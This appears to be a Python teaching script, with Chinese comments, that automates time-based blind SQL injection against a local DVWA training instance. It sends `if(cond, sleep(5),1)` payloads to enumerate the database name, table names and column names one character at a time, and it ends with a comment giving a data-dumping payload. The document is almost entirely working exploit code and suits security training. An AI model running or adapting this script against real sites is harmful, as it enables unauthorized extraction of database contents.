#仅供SQL时间盲注代码参考学习
#python dvwa时间盲注自动化脚本(poc-->exp)
import os
import string
import time

import requests
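# Target and session. Both can be overridden from the environment so a new
# DVWA login does not require editing this file.
INIT_URL = os.environ.get(
    "DVWA_SQLI_URL",
    "http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id=",
)
# Cookies that identify the logged-in DVWA user. PHPSESSID is a live credential:
# read it from the environment rather than committing a real one to source.
# `security=low` selects DVWA's unfiltered sqli_blind handler.
token = {
    "security": "low",
    "PHPSESSID": os.environ.get("PHPSESSID", "p7g937ga5glcvg8m5hv9o9a2ht"),
}
COLUMN_NUM = 11   # upper bound on columns probed per table
COLUMN_LEN = 15   # upper bound on characters probed per table/column name
dbLen = 0         # database-name length, recovered in step 1
dbname = ''       # database name, recovered in step 2
table_num = 0     # table count, recovered in step 3
table = []        # table names, recovered in step 4
table_name = ''   # scratch buffer while a table name is assembled
column = []       # one '/'-separated string of column names per table, step 5
column_name = ''  # scratch buffer while a table's column names are assembled
rightLen = 0      # length of a normal response; never computed by this script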
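def timeOut(url, timeout=3):
    """Send one probe request and report whether the server stalled.

    Returns the literal string "timeout" when the request exceeded `timeout`
    seconds -- the signal that the injected sleep() fired -- the Response on
    success, and the literal string "error" on any other transport failure.
    Callers test `"timeout" in timeOut(url)`, so `timeout` must stay below
    the sleep() duration used in the payloads (5 s).

    Only a real timeout maps to "timeout". The previous catch-all turned a
    refused connection, DNS failure or bad URL into "timeout" as well, so an
    unreachable target read as a true positive on every probe and silently
    produced garbage names. Those failures are now printed and returned as
    "error", which the callers' check reads as "condition false".
    """
    try:
        return requests.get(url, timeout=timeout, cookies=token)
    except requests.Timeout:
        return "timeout"
    except requests.RequestException as e:
        print("request failed:", e)
        return "error"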
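time_start = time.time()

# Every probe injects `1' and if(<cond>, sleep(5), 1)=0#` into the id parameter.
# A true <cond> makes MySQL sleep 5 s, which exceeds timeOut()'s 3 s client
# timeout, so "timeout" is read as "condition held". NOTE(review): a target
# that already answers slower than 3 s without injection makes every probe read
# as true; time a plain request first and raise the client timeout if needed
# (keeping it below 5 s).

MAX_DB_LEN = 20                    # give up on the name length past this
TABLE_NAME_CHARS = range(48, 123)  # '0'..'z': digits, both letter cases, '_'


def _holds(condition):
    """Return True when the injected SQL `condition` is true on the target."""
    url = INIT_URL + "1'and if(" + condition + ",sleep(5),1)=0%23&Submit=Submit#"
    print(url)
    return "timeout" in timeOut(url)


def _guess_name(select_sql):
    """Recover the single identifier produced by `select_sql`, one char at a time.

    Probes ascii(substr((<select_sql>), pos, 1)) for pos = 1..COLUMN_LEN against
    every candidate in TABLE_NAME_CHARS. substr() is 1-based, so index k maps to
    position k+1: the original probed position 0, which substr() resolves to
    '' (ascii 0), so the first real character was never tested. A position with
    no matching candidate is taken as end of string, which stops the scan
    instead of spending 75 requests on each remaining position; a character
    outside TABLE_NAME_CHARS also stops it, so such a name comes back truncated.
    """
    name = ''
    for k in range(COLUMN_LEN):
        found = False
        for j in TABLE_NAME_CHARS:
            cond = ("(ascii(substr((" + select_sql + ")," + str(k + 1) + ",1)))="
                    + str(j))
            if _holds(cond):
                name += chr(j)
                print(name)
                found = True
                break
        if not found:
            break
    return name


# 1. Database-name length: length(database())=N
while True:
    dbLen += 1
    if _holds("length(database())=" + str(dbLen)):
        break
    if dbLen == MAX_DB_LEN:
        # Nothing downstream works without the schema name; stop here rather
        # than running steps 2-5 against an empty name and printing blanks.
        raise SystemExit("not find dblen")
print("dblen=", dbLen)

# 2. Database name: mid(database(),i,1)='c'
# The original alphabet was a-z only, so a digit or '_' in the name was
# silently dropped and every later query targeted the wrong schema. Letters
# compare case-insensitively under MySQL's default collation, so lowercase
# candidates suffice for them.
DB_NAME_CHARS = string.ascii_lowercase + string.digits + '_'
for i in range(1, dbLen + 1):
    for ch in DB_NAME_CHARS:
        if _holds("(mid(database()," + str(i) + ",1))='" + ch + "'"):
            print(ch)
            dbname += ch
            break
print("数据库名字:" + dbname)

# 3. Number of tables in the schema (bounded at 99 probes)
for i in range(1, 100):
    cond = ("(select count(table_name) from information_schema.tables where table_schema='"
            + dbname + "')=" + str(i))
    if _holds(cond):
        table_num = i
        break
print(table_num)

# 4. Table names. NOTE(review): `limit i,1` has no ORDER BY, so this assumes
# the server returns information_schema rows in the same order on every
# request -- confirm on the target if names come back interleaved.
for i in range(table_num):
    table.append(_guess_name(
        "select table_name from information_schema.tables where table_schema='"
        + dbname + "' limit " + str(i) + ",1"))
print("表名:" + str(table))

# 5. Column names, at most COLUMN_NUM per table. Each table's names are joined
# into one '/'-terminated string. An empty name means `limit i,1` returned no
# row, i.e. the table has no more columns, so the remaining slots are skipped.
for tbl in table:
    names = ''
    for i in range(COLUMN_NUM):
        col = _guess_name(
            "select column_name from information_schema.columns where table_schema='"
            + dbname + "'and table_name='" + tbl + "' limit " + str(i) + ",1")
        if not col:
            break
        names += col + '/'
    column.append(names)
print("列名:" + str(column))

time_end = time.time()
print('用时:', time_end - time_start, 's')
print("数据库长度:" + str(dbLen))
print("数据库名字:" + dbname)
print("表数量" + str(table_num))  # was str(i): the leftover column index, not the table count
print("表名:" + str(table))
print("列名:" + str(column))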
#6.拖库 poc: 1'and if((select ascii(substr((select column[i] from dbname.table[j] limit 0,1),1,1)))=i,sleep(5),1)=0#
#具体列具体猜解,全部猜解时间太高